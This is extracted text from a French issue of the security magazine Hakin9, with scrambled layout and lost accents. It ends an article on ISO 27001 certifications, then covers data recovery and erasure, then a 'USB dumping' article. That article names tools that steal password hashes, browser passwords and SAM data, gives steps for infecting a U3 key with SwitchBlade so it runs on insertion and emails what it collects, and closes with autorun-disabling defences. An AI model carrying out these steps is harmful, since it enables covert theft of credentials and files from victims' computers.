La socit britannique BSI (www.bsiglobal.com), par ailleurs aussi organisme de normalisation pour la Grande Bretagne, a propos en 2002 les premires formations ISMS Lead Auditor. A l'poque c'tait par rapport la norme britannique BS7799-2:2002, avant que celle-ci ne devienne une norme internationale ISO 27001:2005. Le BSI agissait comme socit de formation, et a dvelopp un exercice de validation des acquis, aprs lequel tait dlivr un papier marqu Certificate. La socit britannique IRCA (www.irca.org), qui vend des services d'enregistrement d'auditeurs et de professionnels, a dvelopp un schma de certification ISMS Lead Auditor, selon un mode qui lui est propre, qui a t adopt par plusieurs socits de formation en Grande Bretagne comme BVQI, SGS et plus tard le BSI. Dbut 2003 l'ISO a publi la norme ISO 17024 valuation de la conformit
Exigences gnrales pour les organismes de certification procdant la certification de personnes. Cette norme a t labore par le CASCO. Le CASCO de l'ISO est le comit pour l'valuation de la conformit, qui tabli par consensus international les normes fondatrices des systmes de certification dploys travers le monde et contrl par les tats. Le respect de la norme ISO 17024 permet une reconnaissance mutuelle et les changes de personnel au niveau mondial. Pour cela l'ISO 17024 spcifie les exigences qui assurent un fonctionnement homogne, comparable et fiable des organismes de certification qui mettent en oeuvre des dispositifs de certification de personnes., citation de la norme ellemme. En 2005, la socit franaise LSTI (www.lsti.fr), a dvelopp une certification ISO 27001 Lead Auditor. Elle a t accrdite conformment la norme ISO 17024 en juin 2006 (dossier n 04-0091) par le COFRAC (Comit Franais d'Accrditation) (www.cofrac.fr). D'autres certifications d'auditeurs dans d'autres domaines comme la qualit ou l'environnement sont disponibles auprs d'autres socits franaises comme AFNOR Certification (anciennement
66_67_68_69_Pod_Lupa.indd
67
2009-01-05, 19:56
FOCUS
AFAQ-AFNOR) (www.afaq.com), galement accrdite auprs du COFRAC. Le COFRAC est l'autorit d'accrditation pour la France, structure sous forme d'association, reconnue par les pouvoir publics tels que dfini dans le code de la consommation dans l'article L115-28. Les autorits d'accrditation de chaque pays se reconnaissent entre elles, et s'auditent entre elles, ainsi les certifications mises par les organismes de certification accrdits sont valables l'international. Les organismes de certification qui ont choisi de ne pas accrditer leur programme de certification suivant la norme ISO 17024 montrent qu'ils ont dlibrment choisi de ne pas suivre les rgles d'indpendance et d'impartialit imposes par l'ISO 17024. Avec l'ISO 17024, le formateur ne peut pas tre l'auteur des examens, ne peux pas les connatre en dehors de son propre passage de l'examen, et le formateur ne peux pas tre celui qui corrige les copies d'examen. C'est l'examinateur travaillant pour l'organisme de certification qui conoit l'examen et corrige les copies. Une indpendance totale est impose entre formateur et examinateur par la norme ISO 27024 pour viter tout risque de copinage. C'est ce qui donne de la qualit et de la difficult l'examen, et apporte aussi la valeur de la certification. Si quelqu'un vous dit venez chez moi ma certification est facile, c'est ncessairement que celui qui vend la formation n'est pas indpendant avec la certification. Il faut choisir sa socit de formation en y intgrant le choix de l'organisme de certification avec lequel travail la socit de formation.
Une bonne formation est autosuffisante pour russir sa certification. Il n'est pas ncessaire d'avoir travaill intensment le sujet avant la formation. Il faut avoir un minimum d'exprience en informatique et sur la scurit de l'information. Il n'est cependant nullement ncessaire d'tre un expert, il faut plutt tre organis, logique, rigoureux, et savoir organiser son temps pour russir un examen en temps limit. La semaine de formation est parfois intense, il vaut mieux ne pas avoir plusieurs heures de transport chaque jour. Quiconque est ingnieur en informatique et connat les bases en scurit peut russir l'examen en tant assidu lors de sa formation. Mme si la lecture des normes est difficile et rbarbative, il est prfrable
Figure 3. Couverture de la norme ISO 17024 et du livre Management de la Scurit. de les acqurir et les lire avant la formation, notamment pour l'ISO 27001 et l'ISO 27005. La formation en sera plus aise, la comprhension des normes meilleure, et le travail durant la semaine moins lourd. Cela n'est pas indispensable mais l'exprience montre que c'est une aide. Il n'est pas possible de passer la certification sans avoir suivi au moins une fois la formation. C'est notamment impos pour les auditeurs dans la norme ISO 19011 (7.4.1 et 7.4.4), c'est pour cette raison qu'il n'est pas possible de passer l'examen sans suivre la formation. Il existe cependant des livres sur l'ISO 27001 comme Management de la Scurit de l'Information par Alexandre FernandezToro, publi aux ditions Eyrolles qui est beaucoup plus facile lire que les normes elles-mmes et les explique bien, cependant rien ne remplace la lecture des normes.
66_67_68_69_Pod_Lupa.indd
68
2009-01-09, 11:44
Conclusion
Chaque certifi a le droit d'arborer sa certification sous la forme du logo de l'organisme de certification. Dans son CV cela est du plus bel effet cependant les recruteurs n'y sont pas ncessairement sensibles, il vaut mieux garder ce type de CV quand on est dans une socit de service. La mention de la certification doit prciser l'organisme qui l'a dlivr, et dans la mesure du possible sont n de certificat. Le registre de l'organisme de certification permet de retrouver les auditeurs qui ont choisi d'y tre enregistrs. Sur certains rseaux sociaux un logo contrl par l'organisme de certification permet de montrer sa certification, c'est le cas pas exemple pour l'IRCA et LSTI qui ont un groupe sur LinkedIn (www.linkedin.com).
Pour conserver sa certification, il faut mettre en pratique, donc auditer des SMSI pour ISO 27001 Lead Auditor, participer la mise en uvre de SMSI pour ISO 27001 Lead Implementer et participer la gestion de risque en scurit de l'information pour ISO 27005 Risk Manager. Tous les ans comme l'IRCA ou tous les 3 ans chez LSTI, il faut payer et dclarer son travail pour demeurer certifi et affich dans leur registre. Le repassage de l'examen est cependant ncessaire quand le rfrentiel change, par exemple les certifis actuels le sont par rapport la norme ISO 27001 dans son dition de 2005. La nouvelle version est prvue entre 2010 et 2012, ce moment l il faudra repasser l'examen pour tre certifi sur cette nouvelle version. Les socits de formation proposeront des formations spciales courtes pour passer d'une version l'autre. U B L I C I
Au-del d'tre ncessaires pour mettre en uvre la srie des normes ISO 27001, les formations ISO 27001 Lead Implementer, ISO 27005 Risk Manager et ISO 27001 Lead Auditor correspondent toutes les fonctions de base indispen-sables une bonne organisation de la scurit des systmes d'information en entreprise. Ces formations permettent aux ingnieurs ayant une carrire technique de s'orienter vers les aspects organisationnels, ceux qui viennent de la production informatique de s'orienter vers la scurit, et elles reprsentent un panouissement personnel indniable qui explique leur succs, puisque plus de 500 personnes ont une certification personnelle sur l'ISO 27001 en France. Herv Schauer
-est consultant en scurit informatique et dirigeant dHSC depuis 1989. Pour en savoir plus voir son interview dans le mme numro.
2/2009 HAKIN9
69
66_67_68_69_Pod_Lupa.indd
69
2009-01-05, 19:56
DIDIER SICCHIA
Degr de difficult
a gestion globale des donnes n'est pas seulement rserve aux entreprises importantes. Quant aux volumes des nouveaux supports HD externes, parfois plusieurs milliers de Giga octets, on a tendance ne plus rien effacer et garder tout et n'importe quoi. Aucune slection de fichiers n'est tablie malgre dune rigueur ncessaire. Ainsi, arrive le jour o il faut transfrer des donnes, formater un disque dur interne ou externe, partager des informations en ligne, etc. En d'autres termes, parfois nous pchons par omission dans la bonne gestion des donnes et informations multiples. Des lors, comment effectuer ces susdites oprations par moment astreignantes ou douloureuses, s'il se produit un incident fcheux ? Cet article se propose d'examiner la mthode rflchie d'un grand groupe, afin d'offrir aux entreprises une migration, un transfert ou une destruction de donnes efficace. Disposant de cette exprience supplmentaire, les particuliers que nous sommes, auront plus de facilit percevoir les avantages et les inconvnients de certaines alternatives. L'poque de l'archivage sur le seul support papier est aujourd'hui rvolue. Mme les bibliothques nationales en viennent numriser de nombreuses uvres littraires ou des documents historiques. L'ensemble
des commerces ou entreprises est oblig de souscrire un partage de donnes via les supports numriques et aussi l'internet. Ajoutons encore les tonnantes possibilits technologiques propres aux outils BlueTooth, WiFi et USB. Effectivement, tout va vite ... trs vite par moment. Cette simplification des changes au quotidien permet d'amliorer les prestations et services de chacun. Afin d'illustrer cette introduction, nous vous proposons une seule rflexion simple : le prsent article. Dans la mme journe, il pourra tre lu par plusieurs correcteurs, corrig le cas chant, retourn au rdacteur pour de nouvelles modifications et, finalement aboutir dans la messagerie lectronique du rdacteur en chef. Si nous tions encore l'poque des seuls envois postaux, il aurait fallu plusieurs semaines pour un rsultat similaire. Or, si tout va trs vite, il en est de mme de l'accroissement des changes et transactions lectroniques. Le dilemme survint alors : comment grer l'ensemble des donnes ? Eu gard la complexit d'une croissance exponentielle des volumes de donnes, la difficult de prserver une disponibilit optimale des informations est une question majeure. Une entreprise qui ne sait (ou ne peut) grer un environnement de partage, de restauration ou de migration des donnes est une entreprise qui perd autant d'nergie que d'argent. Parfois,
70_71_72_73_74_75_Datarecovery.indd
70
2009-01-06, 19:28
Objectivement, il n'est pas possible de s'apesantir sur les codes et dautres algorithmes mise en uvre afin de dvelopper ces diffrentes applications. D'ailleurs, ces solutions sont bien souvent le seul apanage des entreprises importantes. Nanmoins, il est particulirement intressant de comprendre la politique engage afin de correspondre aux diffrents besoins. Elle constitue une rflexion digne d'intrt pour ceux qui dsirent dvelopper une politique de scurisation des donnes personnelles, mme en environnement restreint (ou encore domestique). En finalit, la gestion des donnes repose principalement sur une rflexion responsable et une rigueur inflexible.
Qui n'a jamais malencontreusement effac des donnes importantes et sous la forme d'un fichier quelconque ? Les philosophes diront que l'erreur est humaine. Nanmoins, une situation de cet acabit peut poser de graves problmes avec un client ou un membre de sa hirarchie. Il faut donc avoir un joker dans sa manche ! Il existe des solutions, des applications de restauration des donnes corrompues ou abmes. Elles s'utilisent dans des cas d'une extrme gravit lorsque les donnes en question sont particulirement sensibles ou importantes et qu'il faut trouver une solution logicielle peu coteuse afin de restaurer un contenu. Voici une liste non exhaustive de situations cauchemardesques que des logiciels professionnels peuvent corriger partiellement ou totalement :
La solution de protection des donnes Evault propose un service de sauvegarde en ligne simple et scuris afin de migrer les donnes sensibles directement vers des centres de rtention de donnes (coffres-forts) et via internet. La procdure est simple raliser, aucune connaissance particulire n'est ncessaire. Cette solution protge l'ensemble des PC de bureau, portables
70_71_72_73_74_75_Datarecovery.indd
71
2009-01-06, 19:28
BACKUP
un formatage accidentel du disque dur s'est produit, un virus a caus des ravages sur de quelconques supports de mmoire, Slave ou Master le support est inutilisable (problme matriel), des fichiers ont t envoys la corbeille par erreur, etc. fichiers FAT12/16/32 et NTFS. Dans cet article, vous trouverez une illustration montrant la capacit de restaurer des fichiers sur un ordinateur domestique. Parmi les applications les plus pratiques, on retrouve notamment (liste non exhaustive) plusieurs programmes gratuits dont l'efficacit n'est pas toujours idale. Nous citons par exemple : Restoration, Davory, Data Advisor, Drive rescue, Roadkil Unstoppable Copier, Avira UnErase. proprits ne permettent pas de rpondre aux besoins du moment. Peut tre est-il obsolte. En attendant, il faut prendre des mesures afin de progresser vers d'autres systmes. Au fil des saisons, les diffrentes applications utilises deviennent lourdes et certaines d'entre elles ne dispose plus de mises jour rgulires, etc. En d'autres termes, il est grand temps de migrer vers des outils plus adapts. Or, la migration des donnes doit tre considre comme une manipulation dlicate. Dans certains cas, elle ncessite bien plus qu'un simple ajustage. Il faut compltement modifier des projets, des protocoles, etc. Prenons un exemple explicite (et particulirement exagr, penserez-vous). Durant 10 ans, une socit de dveloppement quelconque a dvelopp des applications professionnelles en utilisant la station MSVC v6 de Microsoft. L'ensemble des projets est archiv sur des disques durs externes formats FAT32. Aujourd'hui, elle souhaite utiliser une autre station de travail comme Visual C++ Express 2008 (beaucoup plus rcente) ou encore autre chose. Le problme est important, VC++ 2008 dispose d'un environnement de travail trs diffrent de MSVC v6. La socit en question dcide aussi de stocker ses informations et donnes sur des supports distants (en ligne). Aussi, le nouvel environnement de travail reposera sur une architecture NTFS. Par consquent, il y a un problme de compatibilit directe parmi la multitude des fichiers, des OS, des applications, etc. La migration des anciens projets vers la nouvelle station de dveloppement est possible mais astreignante tant en temps qu'en nergie. Ajoutons encore une quantit d'informations obsoltes ou corrompues datant du dbut des annes 90 sur support disquette 31/2 et 51/2. Comment faire au mieux afin de migrer efficacement ? La migration des donnes est donc le processus consistant transfrer des donnes d'un type de stockage, de format ou de systme informatique vers un autre plus performant. Elle est souvent requise lorsque les organisations changent de systmes informatiques ou effectuent des mises jour vers de
Or, certaines applications professionnelles disposent d'une capacit importante de restauration. Elles sont capables de restaurer des fichiers que les logiciels standards de restauration ne peuvent mme pas lire. Certains programmes sont dvelopps essentiellement pour Windows et permettent de rcuprer tous types de fichiers notamment Word, Excel, PowerPoint, PST Outlook, bases de donnes, AutoCAD ou Microsoft SQL, ainsi que les formats d'image les plus courants, mais aussi des fichiers de musique et de vido aux formats MPEG, AVI et MP3. Aussi, on a la possibilit de rcuprer des fichiers supprims de votre corbeille et mme si le disque dur a t format par accident. Encore une fois, aucune connaissance technique particulire n'est requise pour ces diffrentes oprations. L'ensemble de la procdure se droule dans une environnement particulirement intuitif. Un outil de rcupration doit tre compatible avec tous les systmes de
Par contre, certains ShareWares donnent des rsultats plus que convaincants. Par exemple, il existe une application nomme FileRecovery. Ce programme dispose d'une aptitude impressionnante retrouver et restaurer des fichiers abms ou effacs par mgarde. De plus, il est possible de disposer d'une version d'valuation qui permet de visualiser l'ensemble des fichiers rcuprables avant d'envisager l'achat d'une licence (environ 100 euros).
Figure 3. Une rcupration des donnes avec FileRecovery.tif posx=c posy=c fit=W grow=H/>>
72 HAKIN9 <<NUMER_LEWY>>
70_71_72_73_74_75_Datarecovery.indd
72
2009-01-06, 19:28
nouveaux systmes. Gnralement, on utilise des logiciels spcialiss pour automatiser ces migrations puisque l'opration comporte de nombreux aspects sensibles. Ce peut tre aussi par moment un vrai sac de nuds (voir l'exemple prcdent). Pendant le processus, les donnes historiques stockes sur des supports anciens ou obsoltes sont values, indexes et dupliques. Elles sont ensuite migres vers un support plus rcent, plus fiable et plus conomique. En conclusion, une migration des donnes responsable apporte diffrents avantages importants : gestion des systmes proactive, rduction des cots de stockage, mthodologie des donnes rationalises, politique de conservation des donnes responsable.
Dans un environnement rduit (peut tre mme domestique) une migration des donnes doit comporter plusieurs rflexions. Dans notre prcdent exemple, ne comptez pas compiler un code MSVC sous GCC linux. Il faut donc comprendre tant les besoins que les astreintes, les avantages et les rigueurs. Chaque cas tant diffrent des autres, il convient de bien comprendre les besoins propres chacun. Dans le marasme des informations engranges durant des annes, le plus important n'est pas le logiciel de migration des donnes. Avant tout, il faut absolument dfinir la politique adquate et propre l'entreprise seule. La pense du groupe se dfinit en 5 points importants : coopration avec le client afin d'valuer les supports et la nature des donnes, un support cible est alors dfini avec le client pour la future distribution des donnes, les donnes sont migres (restauration ventuelle des donnes corrompues), les donnes sont indexes, dupliques et purges afin de rduire l'encombrement de stockage, les donnes sont restitues via le
La restauration des donnes ne consiste pas restaurer des supports corrompus ou abms (nanmoins, une rcupration sera ncessaire dans des cas particuliers). Il s'agit de restituer un ensemble important d'informations enregistr sur un support obsolte. Si l'informatique d'aujourd'hui apporte des alternatives en matire de stockage pratique, ce n'tait pas aussi facile 25 ans en arrire. Effectivement, la majorit des enregistrements de donnes s'effectuaient sur des bandes magntiques et de manire analogique. D'ailleurs, on peut lgitimement douter que nos plus jeunes lecteurs n'aient jamais eu l'occasion de voir une disquette 5 (modle Apple 2E et Apple 2C). Imaginez encore les bandes magntiques sur bobines libres ou les galettes aussi. Afin de restaurer des donnes qui reposent sur de vieux supports, il faut disposer de machines particulires tant le nombre des procds est important. Voici une liste non exhaustive (type et constructeur confondu) : DLT II, III, IV, TK50/TK70, Cartouches SLR/MLR, 8mm Exabyte Mammoth, AIT Mini-cartouches DC2000, Cartouches Ditto, Cartouches Travan, Cartouches Irwin Rhomat, Cassettes DCC, Cartouches 1/2" 3480, 3490, 3590, DC600A, DC6150, DC6525, Magnus, DAT 4mm DDS1, DDS2, DDS3, Bobines 9 pistes 1/2", Cartouches 3570 1/2", Disques optiques WORM 5,25" et 3,5", Disque magnto-optique L/E 5.25", 3.5", Disques optiques 12.
Le contexte lgislatif et de mise en conformit actuel oblige les socits de sassurer de la disponibilit permanente des donnes. Que se passe-t-il en cas de panne sur la grappe de stockage qui hberge vos donnes? De plus, il ne faut pas oublier que tout quipement ou
<<NUMER_PRAWY>> HAKIN9 73
70_71_72_73_74_75_Datarecovery.indd
73
2009-01-06, 19:28
BACKUP
Sur Internet
http://www.i365.com Le site officiel du groupe i365 (applications FileRecovery et Evault), http://seagatedatarecovery.com Le site officiel Seagate spcialis dans la gestion des donnes en entreprise, http://www.free-av.com/en/index.html Site officiel du groupe Avira (application freeware de restauration UnErase), http://en.wikipedia.org/wiki/Valdemar_Poulsen Un historique du projet premier relatif l'enregistrement analogique, http://www.generation-nt.com/torrentspy-mpaa-valence-media-actualite-14813.html Un hacker repenti reconnat avoir fouiller les poubelles du groupe TorrentSpy.
composant matriel est susceptible de tomber en panne un jour ou l'autre. Or, la diffrence entre une situation de crise et un dsagrment, c'est la capacit rgler le problme provoqu par cette panne lorsqu'elle survient. En conclusion, il n'est pas sage de disposer d'informations sensibles sur support obsolte en ayant l'assurance que a marchera toujours mme dans 10 ans. Afin de palier ce problme, de nombreuses socits se proposent de migrer les donnes contenues sur de vieux supports vers des outils plus pertinents, fiables et pratiques.
Malgr ce qu'on pourrait penser, l'limination scurise des quipements informatiques est une proccupation de premier plan pour les responsables informatiques. On imagine bien que les donnes stockes sur des disques durs, fichiers contenant des dossiers relatifs des transactions financires, des secrets commerciaux ou le code source de logiciels doivent subir un traitement particulier entre leur cration et leur destruction. Lorsque des ordinateurs et des systmes de stockage arrivent en fin de vie et sont mis hors service, les donnes stockes sur les disques durs de ces units doivent tre totalement et dfinitivement retires de manire scurise pour s'assurer que les informations dposes et sensibles ne tombent entre de mauvaises mains. Sur internet, on peut retrouver d'tranges rcits relatifs aux piratages des poubelles d'entreprises importantes afin de dcouvrir des informations particulires (factures, fax, etc). Ajoutons que celles-ci peuvent se ngocier plusieurs milliers d'euros auprs de
74 HAKIN9 <<NUMER_LEWY>>
la concurrence. Face cette relle motivation, de nombreuses socits finissent par stocker leurs anciens disques hors service dans des locaux sous cl qui ncessitent souvent la location de plus en plus chre d'un espace en entrept priv. L'alternative cette astreinte est l'effacement radical des donnes. Ds lors, on ne parle pas prsentement d'un simple formatage. Il est intressant de signaler qu'il existe diffrents outils d'effacement de donnes (certains sont mme gratuits). Malheureusement, ils ne disposent pas toujours d'algorithmes complexes afin d'effectuer un formatage radical et garanti. Par contre, les professionnels fournissent systmatiquement un certificat d'effacement. Cette assurance nous permet d'liminer ou de recycler un disque dur en toute confiance et sans avoir se proccuper de l'avenir du support HD. D'ailleurs, ces solutions sont approuves par la NSA, le dpartement amricain de la dfense, les services des forces armes amricaines, le NCSC et lOTAN, etc. Ces solutions engagent par moment des applications complexes notamment au sein d'un large rseau d'entreprise ou via l'internet. Nanmoins, diffrentes entreprises proposent aussi ce service aux particuliers et petites ou moyennes entreprises via une cl USB sur laquelle est embarque la solution adquate. Une ide cadeau pour les administrateurs soucieux de rpondre quelques angoisses lgitimes eu gard l'environnement concurrentiel et volutifs de ces temps de crise.
proposs par de nombreux prestataires de services. Chacun trouvera son compte via internet et selon ses besoins propres. Mme s'ils sont plusieurs prsenter une gestion apprciable des donnes, les concurrents disposant des 5 politiques dveloppes dans ce dossier ne sont pas trs nombreux. Lorsqu'il faut s'informer auprs d'un professionnel afin de lui confier une partie ou la totalit de ses donnes confidentielles (autant dire la vie et la mort de l'entreprise), il convient de faire le bon choix. Il est ncessaire de faire appel aux entreprises spcialise. Nanmoins, sur la toile, il est possible de trouver de nombreuse applications afin de grer l'information numrique dans un cadre domestique (petite entreprise encore). Ainsi, il n'est pas ncessaire d'engager des sommes importantes si les besoins sont particulirement rduits. D'ailleurs, le DVD hakin9 fourmille de nombreuse applications intressantes et gratuites notamment dans ce registre particulier. Cet examen sommaire d'une politique de gestion des donnes en entreprise nous aide bien cerner les bonnes habitudes dvelopper dans un contexte individuel, comprendre domestique. Traditionnellement, les difficults surgissent lorsqu'il n'y a aucune rigueur dans la gestion des donnes. Ceci est bien regrettable. Personnellement, il m'est dj arriv de devoir formater et rinstaller un OS sur des ordinateurs quelconques alors que les propritaires oublieux n'avaient pas gard soigneusement les CD de drivers. Il s'agit d'une perte de temps considrable. N'oubliez-pas (et malgr ce qu'on pourrait penser) : la rigueur d'une gestion responsable des donnes vous facilitera grandement la vie et garantira la prennit de vos informations personnelles. Sicchia Didier
Conclusion
Certes, l'ensemble des principes et des applications cits durant cet article sont
Sicchia Didier est l'origine de nombreux exploits, dossiers et articles divers pour plusieurs publications francophones consacres la scurit informatique et au dveloppement. Autodidacte et passionn, son exprience se porte notamment sur les ShellCodes, les dbordements d'allocations de mmoire, les RootKits, etc. Plus que tout autre chose, c'est l'esprit alternatif de la communaut UnderGround qui le motive. Pour contacter l'auteur : didier.sicchia@free.fr
70_71_72_73_74_75_Datarecovery.indd
74
2009-01-06, 19:28
<<NUMER_PRAWY>> HAKIN9
75
70_71_72_73_74_75_Datarecovery.indd
75
2009-01-06, 19:26
DBUTANTS
NICOLAS RENARD
USB dumping
Degr de difficult
L'objectif de cet article est de montrer quon peut tr facilement voler des donnes ou mme de sen faire voler cause dune cl usb et la dtection automatique de Windows.
es cls USB (Universal Serial Bus) reprsentent aujourd'hui un support privilgi pour le stockage et le transport de donnes et donc le vol de donnes et l'inoculation de parasites, surtout depuis le standard U3. Elles permettent une utilisation beaucoup plus souple et un espace disponible toujours plus important. Le standard U3 permet de stocker sur des cls USB des applications autonomes qui s'excutent automatiquement lorsque celles-ci sont connectes un ordinateur. Les cls U3 sont susceptibles de contenir plusieurs informations personnelles ou confidentielles. Le vol de celles-ci peut avoir des consquences importantes: La configuration du client de messagerie et ses contacts, les sites favoris installs sur le navigateur, des mots de passe grs par une application ddie (application frquemment offerte par dfaut avec la cl).
Un processus tournant en arrire plan, dissimul par un crochetage (hook) afin de ne pas apparatre dans la liste des processus, peut-tre en coute dune quelconque clef USB qui serait connecte lordinateur infect pour en copier en arrire-plan son contenu. Certains outils permettent de faire une image complte de la cl (toute la mmoire y compris celle sense ne pas/plus contenir de donnes pour votre systme dexploitation), rcuprer certains types de fichiers et vous les envoyer par mail, par ftp
Ces cls sont gnralement fournies avec un lanceur (Launchpad). Lors de linsertion de la clef celui-ci donne accs aux diverses applications. Certains lanceurs malveillants permettent d'excuter directement des actions l'insertion de la cl, et sont fournis avec des outils permettant de rcuprer les tables de mots de passe, d'installer une capture de clavier ou un rootkit.
Cette technique reprsente la mthode inverse. Il sagit dun programme situ sur la cl qui va copier des donnes prsentes sur lordinateur. Pour ce faire, la cl peut contenir un amorage automatique (autorun) et, lorsquelle est branche sur un ordinateur victime, une application ou un spyware peut tre implant silencieusement sur la machine et excuter les fonctions pour lesquelles il a t programm (vol de mots de passe (Internet, Windows, etc.), favoris Internet, carnet d'adresse, de documents spcifiques (Word, pdf....). Il suffit alors de se brancher quelques minutes sur un port USB pour lancer silencieusement une copie d'une partie d'un disque dur vers ce priphrique amovible.
76_77_78_usb_dumping.indd
76
2009-01-05, 18:27
LA CL USB ET LA SCURIT
Quelques outils
nombre dinformations concernant le systme lui-mme, mais aussi dtruire ces informations. De plus celui-ci est compatible avec Windows XP et Windows Vista. Voici une liste des principales informations quil supporte: password hashes, LSA secrets, ip informations, Dump SAM, Internet Explorer Password Grabber, Windows Update Lister, Netstat, Messenger password Dumper, FireFox Password Stealer, Silent VNC installer (with external IP send), Username adder, FireFox Password Stealer. Fermez toutes les applications U3 puis accdez votre lecteur et cliquez sur Suivant. Dfinir un mot de passe pour la sauvegarde des fichiers zip Cliquez sur Suivant et il commencera la sauvegarde de donnes. Attendez que le Customizer universel ait fini de modifier votre partition CD et de remplacer vos fichiers sur le lecteur flash. La modification doit maintenant tre complte, dbranchez votre cl U3 et rebranchez-la. Copier C:\SwithBlade\SBConfig.exe sur la partie stockage de la cl. Excuter SBConfig.exe Slectionnez les options que vous souhaitez utiliser et indiquez votre adresse e-mail et votre mot de passe (si vous souhaitez recevoir ces informations par e-mail). Cliquez sur le bouton Update Config, une bote de message devrait apparatre pour confirmer la mise jour puis cliquez sur Turn on PL/ Turn off PL selon que vous souhaitiez activer ou non le payload. Enfin, cliquez sur le bouton turn U3 Launchpad On pour activer linfection de lapplication U3.
Les outils prsents ici fonctionnent essentiellement sous un environnement Windows XP ou Vista. Les systmes Linux et MacOSX ne semblent pas affects par ce genre de problme.
USB Dumper
USB Dumper est un programme qui fonctionne sur lordinateur et non pas sur la cl. Il est donc ncessaire que la personne victime connecte sa cl USB sur lordinateur de lassaillant. Cependant il peut-tre intressant de savoir que dans la majorit des cas, une personne prfre connecter sa cl USB sur lordinateur de la victime, plutt que de laisser une clef USB inconnue et branche sur son propre ordinateur. Pour expliquer lintrt dun tel logiciel, prenons un exemple: imaginez une grande confrence/salon runissant plusieurs salaris de diverses entreprises dans un htel ou un autre disposant dun accs Internet, impression, avec accs au port USB activ. Il peut-tre intressant pour une personne malveillante dinstaller ce logiciel sur cet ordinateur, esprant ainsi rcuprer une grande quantit de donnes aprs ce meeting Cela marche aussi bien pour les cybercafs. Lutilisation de ce logiciel tant trs simple, je vous laisse la dcouvrir par vous-mme.
USB SwithBlade exige des privilges d'administration afin de pouvoir lancer la charge utile.
Installation de SwithBlade
Tout dabord, il est important de possder une cl USB de type U3 car le logiciel par dfaut va tre infect et customis par SwithBlade. Plusieurs faons de linstaller sont possibles. Il est possible dutiliser des systmes dinstallation automatique pour les cls SanDisk & Memorex ou des installations hybrides (U3 & manuel). Ici, nous allons utiliser deux outils: Gonzor SwithBlade et Universal customiser pour modifier le logiciel de la cl. Lintrt de lUniversal customiser est la possibilit de remplacer le firmware dorigine stock sur la cl USB par un firmware modifi et infect par SwitchBlade. Ainsi, SwitchBlade sera charg linsertion de la cl dans lordinateur. Voici la procdure suivre: Dcompressez le Customizer universel dans C:\Universal_ Customizer Dcompressez le gonzor SwitchBlade payload dans C:\SwitchBlade Copiez le fichier U3CUSTOM.ISO de C:\SwitchBlade dans C:\Universal_ Customizer\BIN Executer C:\Universal_Customizer\ Universal_Customizer.exe. Slectionnez Accepter et cliquez sur Suivant .
USB Hacksaw
USB Hacksaw est une version modifie dUSB dumper et une extension dUSB SwithBlade. Ce programme fonctionne toujours en arrire plan sur la machine cible, mais permet en plus de faire une copie de la cl USB et denvoyer son contenu via la messagerie Gmail en utilisant une connexion SMTP scurise. Cette application permet en plus d'ventuellement contaminer la cl USB connecte afin de propager loutil sur dautres machines. Dans le cas dune entreprise, ce type dattaque peut devenir trs grave et peut constituer une faille de scurit.
Voila votre cl est maintenant prte. Il ne vous reste plus que la connecter sur un ordinateur de type Windows et le tour est jou.
Nous avons pu voir qu'il peut-tre trs facile de crer une cl USB pirate et de se faire voler ses donnes. Nous allons maintenant voir quelques techniques permettant de se prmunir de se genre de problme et ainsi viter d'avoir des donnes confidentielles dans la nature.
USB SwithBlade
USB SwithBlade emmne encore un peu plus loin la rcolte dinformations. En effet, il permet de rcouperer un bon
76_77_78_usb_dumping.indd
77
2009-01-05, 18:27
DBUTANTS
Normalement, un dispositif USB de stockage ne permet pas cette excution automatique. Le standard U3 a fait en sorte que les cls USB soient vues comme un lecteur de CD ou de DVD lors de leur insertion, rendant ainsi possible la fonction Autorun pour ces dispositifs. Cette fonction n'tant pas forcment ncessaire il peut tre intressant de la dsactiver. Vrifier, en cas de soupon, tout fichier inconnu trouv sur une cl USB. Protger les donnes places sur une cl USB sous une forme chiffre ncessitant une extraction pour pouvoir les utiliser. Cette solution introduit une tape supplmentaire qui peut paratre contraignante mais particulirement utile le paramtre NoDriveTypeAutoRun qui contrle lactivation ou non de lexcution automatique pour les priphriques. Sous Windows, laide de lditeur de la base de registre regedit suivre le chemin suivant: HKEY_CURRENT_USER/Software/ Microsoft/CurrentVersion/Policies/Explorer/. Le paramtre NoDriveTypeAutoRun dfini sur 0x95, dsactive l'excution automatique sur les lecteurs, les priphriques rseaux et les priphriques amovibles inconnus. partir de Windows XP SP2 (SP3 inclus), le paramtre NoDriveTypeAutoRun est configur sur 0x91 par dfaut. Cela active l'excution automatique sur les priphriques de stockage amovibles. En utilisant la stratgie de groupe, il existe un paramtre sous Configuration utilisateur\Modles d'administration\Composants Windows\ Stratgies de lecture automatique qui vous permet de grer le paramtre NoDriveTypeAutoRun. La slection de l'option Dsactiver l'excution automatique et slectionner les lecteurs de CD-ROM et lecteurs amovibles dsactive l'excution automatique sur les deux types de lecteurs. Pour Windows Vista allez la cl suivante: HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Services\ Cdrom Modifiez la chane AutoRun selon votre choix: tapez la valeur 1 pour activer l'AutoRun tapez la valeur 0 pour dsactiver l'AutoRun
Conclusion
Pour conclure, nous pouvons donc dire qu'il est important de ne pas connecter sa cl usb sur n'importe quel ordinateur d'autant plus si elle possde des donnes confidentielles. Pensez crypter ses donnes et bien les effaces lorsque vous les supprimer de la cl. Seul les utilisateurs windows semble vraiment affects par ce problme, mais il s'agit du systme le plus reprsent; Donc attention!
Renard Nicolas
Nicolas Renard certifi CISCO CCNA et Network Security, l'auteur est passionn par la scurit informatique depuis son enfance. Il souhaite travailler dans ce domaine. Pour contacter l'auteur : nicolas.renard@supinfo.com
76_77_78_usb_dumping.indd
78
2009-01-05, 18:27
BULLETIN DABONNEMENT
comment se dfendre
Merci de remplir ce bon de commande et de nous le retourner par fax : (+48) 22 244 24 59 ou par courrier : Software-Wydawnictwo Sp. z o.o., Bokserska 1, 02-682 Varsovie, Pologne Tl. (+33) 170 610 717 E-mail : abonnement@software.com.pl Yahoo Messenger : software_abonnement
Prnom/Nom ........................................................................................ Entreprise ............................................................................................. Adresse ................................................................................................. ................................................................................................................ Code postal .......................................................................................... Ville ........................................................................................................ Tlphone ............................................................................................. Fax ......................................................................................................... Je souhaite recevoir l'abonnement partir du numro .................... ................................................................................................................ En cadeau je souhaite recevoir ....................................................... ................................................................................................................ E-mail (indispensable pour envoyer la facture) ................................ ................................................................................................................
code CVC/CVV
expire le _______________ date et signature obligatoires
type de carte (MasterCard/Visa/Diners Club/Polcard/ICB) Chque la ordre de : Software-Wydawnictwo Sp z o.o. Bokserska 1, 02-682 Varsovie Pologne Virement bancaire :
